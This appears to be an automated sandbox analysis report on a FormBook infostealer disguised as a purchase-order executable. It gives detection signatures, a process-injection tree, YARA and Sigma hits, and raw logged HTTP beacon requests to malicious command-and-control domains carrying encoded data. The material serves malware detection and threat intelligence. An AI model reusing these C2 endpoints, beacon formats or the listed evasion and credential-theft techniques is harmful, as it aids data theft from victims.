Edit tour

Windows Analysis Report
PURCHASE ORDER N0259305-06SN.exe

Overview

General Information

Sample name:	PURCHASE ORDER N0259305-06SN.exe
Analysis ID:	1640568
MD5:	0cce3d84e27abc94018b6631fdeedd44
SHA1:	9e0873d69eed9a8e0b0fa455bd96249f101db4c2
SHA256:	d39bb5ded987a89ae0b38cfb48cef0dbfe6845afc8b841b6f1d8796d83bf5342
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

PURCHASE ORDER N0259305-06SN.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe" MD5: 0CCE3D84E27ABC94018B6631FDEEDD44)

svchost.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

KNMXQQ8gZH4SSEbWc22OgT.exe (PID: 5128 cmdline: "C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\Uv0wxf5h.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

HOSTNAME.EXE (PID: 6112 cmdline: "C:\Windows\SysWOW64\HOSTNAME.EXE" MD5: B1C51FED46434CF91E65C7B605F8EF3A)

KNMXQQ8gZH4SSEbWc22OgT.exe (PID: 1296 cmdline: "C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\jdJEZM14.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 356 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.3494046989.0000000003660000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1348873063.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1353670483.0000000005900000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3492124439.00000000032B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3494131195.00000000036B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3494078242.0000000003190000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1352817809.00000000037A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", CommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", ParentImage: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe, ParentProcessId: 6968, ParentProcessName: PURCHASE ORDER N0259305-06SN.exe, ProcessCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", ProcessId: 7020, ProcessName: svchost.exe

Sigma detected: Suspicious Execution of Hostname

Source: Process started

Author: frack113: Data: Command: "C:\Windows\SysWOW64\HOSTNAME.EXE", CommandLine: "C:\Windows\SysWOW64\HOSTNAME.EXE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\HOSTNAME.EXE, NewProcessName: C:\Windows\SysWOW64\HOSTNAME.EXE, OriginalFileName: C:\Windows\SysWOW64\HOSTNAME.EXE, ParentCommandLine: "C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\Uv0wxf5h.exe" , ParentImage: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe, ParentProcessId: 5128, ParentProcessName: KNMXQQ8gZH4SSEbWc22OgT.exe, ProcessCommandLine: "C:\Windows\SysWOW64\HOSTNAME.EXE", ProcessId: 6112, ProcessName: HOSTNAME.EXE

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", CommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", ParentImage: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe, ParentProcessId: 6968, ParentProcessName: PURCHASE ORDER N0259305-06SN.exe, ProcessCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe", ProcessId: 7020, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PURCHASE ORDER N0259305-06SN.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.nhc7tdkp6.live/k6z0/?JNtd=4xO8Zf&lHQ8EXRh=+DmvplHbbsHxj5SH30pDJ2+Cm5OQGz5cRrhIVr0qrGELOUyjdwYGiZsTs9fOANno9qVMAJn+eUCBhfFSVALuTjGQUmaJ4qZMZ72TtKm/rh9c5yb7XQ==	Avira URL Cloud: Label: malware
Source: http://www.xrrkkv.info/6gk2/?lHQ8EXRh=pDWQ31WSmcfT7q5lOpRK7CY+kwko3/YxCvifTOHJLT3J2OEhQyU0/Pr2SrVLD94yNdd3jMhFz8nSHAGplUvRiZufXQhqb0EFAeA2oQstMWRSHZ54ow==&JNtd=4xO8Zf	Avira URL Cloud: Label: phishing
Source: http://www.satoshichecker.xyz/0hyc/?JNtd=4xO8Zf&lHQ8EXRh=UFqSpO+DrOk2iebaBdc9sRNZIyq1i2WmKCFS/DYv0xNYn5KFG60xYq8zVFOfvQynQtd0Hpv0u+JfqNO8pf0Qgpu+fP8ZDYHqiOU1naHIa8FdlRWy5g==	Avira URL Cloud: Label: malware
Source: http://www.2hvve.xyz/9j4s/?lHQ8EXRh=hk9fQU9O4/6vuccKdQ3DyIVbyrGLowEqZi0eMKS5EqG+CJXtWBeEuNktvgGx6bh+KDN3983a/+oCw9qFrgqgJTuWIHt5Q9T9ckYFFAzk68Jid1TPiw==&JNtd=4xO8Zf	Avira URL Cloud: Label: malware
Source: http://www.zkkv3oae.vip/caz6/?lHQ8EXRh=ZawoI2OQAkkq7f3dAVQFNNDc+5yrMH39hW/9aQPNm2aH8QZDTNyWHfkSZ/Re2NRRNsj8q9f54Wk2nBQ8XCZdrkEvixy8ZFqQ+Up6stySrr/akm8pJg==&JNtd=4xO8Zf	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: PURCHASE ORDER N0259305-06SN.exe	Virustotal: Detection: 60%			Perma Link
Source: PURCHASE ORDER N0259305-06SN.exe	ReversingLabs: Detection: 75%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3494046989.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1348873063.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1353670483.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3492124439.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3494131195.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3494078242.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1352817809.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: PURCHASE ORDER N0259305-06SN.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: hostname.pdbGCTL source: svchost.exe, 00000002.00000002.1350941552.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1350978356.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3493011892.00000000014FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: hostname.pdb source: svchost.exe, 00000002.00000002.1350941552.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1350978356.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3493011892.00000000014FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1042534063.0000000003660000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1043381545.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1351629809.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1255304923.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1351629809.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1257594091.0000000003200000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000003.1349034945.000000000374E000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494438360.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000003.1353725951.00000000038F0000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494438360.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1042534063.0000000003660000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1043381545.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1351629809.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1255304923.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1351629809.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1257594091.0000000003200000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, HOSTNAME.EXE, 0000000C.00000003.1349034945.000000000374E000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494438360.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000003.1353725951.00000000038F0000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3494438360.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: HOSTNAME.EXE, 0000000C.00000002.3494932926.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3492564549.000000000352F000.00000004.00000020.00020000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000000.1420578574.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1639894308.0000000007A2C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: HOSTNAME.EXE, 0000000C.00000002.3494932926.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, HOSTNAME.EXE, 0000000C.00000002.3492564549.000000000352F000.00000004.00000020.00020000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000000.1420578574.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1639894308.0000000007A2C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3492017410.0000000000EFF000.00000002.00000001.01000000.00000007.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000000.1420355982.0000000000EFF000.00000002.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0025445A
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025C6D1 FindFirstFileW,FindClose,	0_2_0025C6D1
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0025C75C
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0025EF95
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0025F0F2
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0025F3F3
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_002537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002537EF
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00253B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00253B12
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0025BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0025BCBC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 12_2_032CCAC0 FindFirstFileW,FindNextFileW,FindClose,	12_2_032CCAC0

Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 4x nop then xor eax, eax		12_2_032B9E70
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 4x nop then mov ebx, 00000004h		12_2_038E04E8

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.pembukaan.xyz
Source:	DNS query: www.ddvids.xyz
Source:	DNS query: www.2hvve.xyz
Source:	DNS query: www.shibbets.xyz
Source:	DNS query: www.satoshichecker.xyz

Source: global traffic

TCP traffic: 192.168.2.10:57030 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 172.67.222.201 172.67.222.201
Source: Joe Sandbox View	IP Address: 149.104.184.89 149.104.184.89
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_002622EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_002622EE

Source: global traffic	HTTP traffic detected: GET /6gk2/?lHQ8EXRh=pDWQ31WSmcfT7q5lOpRK7CY+kwko3/YxCvifTOHJLT3J2OEhQyU0/Pr2SrVLD94yNdd3jMhFz8nSHAGplUvRiZufXQhqb0EFAeA2oQstMWRSHZ54ow==&JNtd=4xO8Zf HTTP/1.1Host: www.xrrkkv.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /caz6/?lHQ8EXRh=ZawoI2OQAkkq7f3dAVQFNNDc+5yrMH39hW/9aQPNm2aH8QZDTNyWHfkSZ/Re2NRRNsj8q9f54Wk2nBQ8XCZdrkEvixy8ZFqQ+Up6stySrr/akm8pJg==&JNtd=4xO8Zf HTTP/1.1Host: www.zkkv3oae.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /h6w2/?lHQ8EXRh=UCwWSM3nRx2p3h9FqYftYzSn5KsYSsRAfqyxoOOuZdW9AxGVco4phG7fCi4unkTlPSeGfOFMA2ar2D3yASGNjnzHhL+ozLnVOdGtiCqc1WLadgI43A==&JNtd=4xO8Zf HTTP/1.1Host: www.btbjpu.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /0bn4/?lHQ8EXRh=SYr/NPlxL88crzavyMEJU2oBj+ROuqgSpaz6ny0u/wQ4hiaKkBRNpjh7/TKEp8x+PVrjbxLZJhuaHvHa9eVKIjWG7/ftAHfIHtqDKzQE/QTtsUasMQ==&JNtd=4xO8Zf HTTP/1.1Host: www.christmas-goods.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /8e17/?lHQ8EXRh=rW7hLScnffKFcdheKfL3ONwW0K3R0Hfab1Dlv2OjG5QW8bBr/Rdb8Z+4xbzU8F62pAFaxoZdEtjwEty2d4vWQLqRTdRMA17vVG+1lWyhTfxuK4EPYw==&JNtd=4xO8Zf HTTP/1.1Host: www.ddvids.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /k6z0/?JNtd=4xO8Zf&lHQ8EXRh=+DmvplHbbsHxj5SH30pDJ2+Cm5OQGz5cRrhIVr0qrGELOUyjdwYGiZsTs9fOANno9qVMAJn+eUCBhfFSVALuTjGQUmaJ4qZMZ72TtKm/rh9c5yb7XQ== HTTP/1.1Host: www.nhc7tdkp6.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /unmb/?lHQ8EXRh=ED+2iTGcn3FnC5Yp41UDBWUlUistjdV8VmRw3QlO32MfqLvo3mJ0tLvm1A+QKVzhPZXB7LJmEKK99BbGpF5F4B85uv2sJNUcQu0Ap/AclPQIcGCnmw==&JNtd=4xO8Zf HTTP/1.1Host: www.brispere.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /ksev/?lHQ8EXRh=6PqoeIz1qxI2aTpeMBgT4Bg6t9AP3w9D/+ru47sSOC6rnihfFEpVxh4euRWPkhT1OB/Z0sX66AXuMPycn/4xt9uv+q9FWMgt7oCF2/F2HS0o8+wHCQ==&JNtd=4xO8Zf HTTP/1.1Host: www.stellaritemvault.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /9j4s/?lHQ8EXRh=hk9fQU9O4/6vuccKdQ3DyIVbyrGLowEqZi0eMKS5EqG+CJXtWBeEuNktvgGx6bh+KDN3983a/+oCw9qFrgqgJTuWIHt5Q9T9ckYFFAzk68Jid1TPiw==&JNtd=4xO8Zf HTTP/1.1Host: www.2hvve.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /l01w/?JNtd=4xO8Zf&lHQ8EXRh=IStlWKGZBbL9Gqu/wJkVwBfJOvG5JhVC4GB0OPmgC+p9vaOxVt6rMzsaxt2VKxkE2SHyx7kpbVG5WVuWe6/YanWdmkvjlzhN+19kE5TX4dZ3OUzSzQ== HTTP/1.1Host: www.shibbets.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /1dqu/?lHQ8EXRh=5IvXIGknD7Vb7cvnjM+Z+9foeN8N1hRf3atz0SZRmb9hnkCBU+Z/aqlp1FCDg9KKNSjPi5S2isilkCHhX7niAwMz51Id1i+f+OpS/O9jLARs+q/hEA==&JNtd=4xO8Zf HTTP/1.1Host: www.spinco.newsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
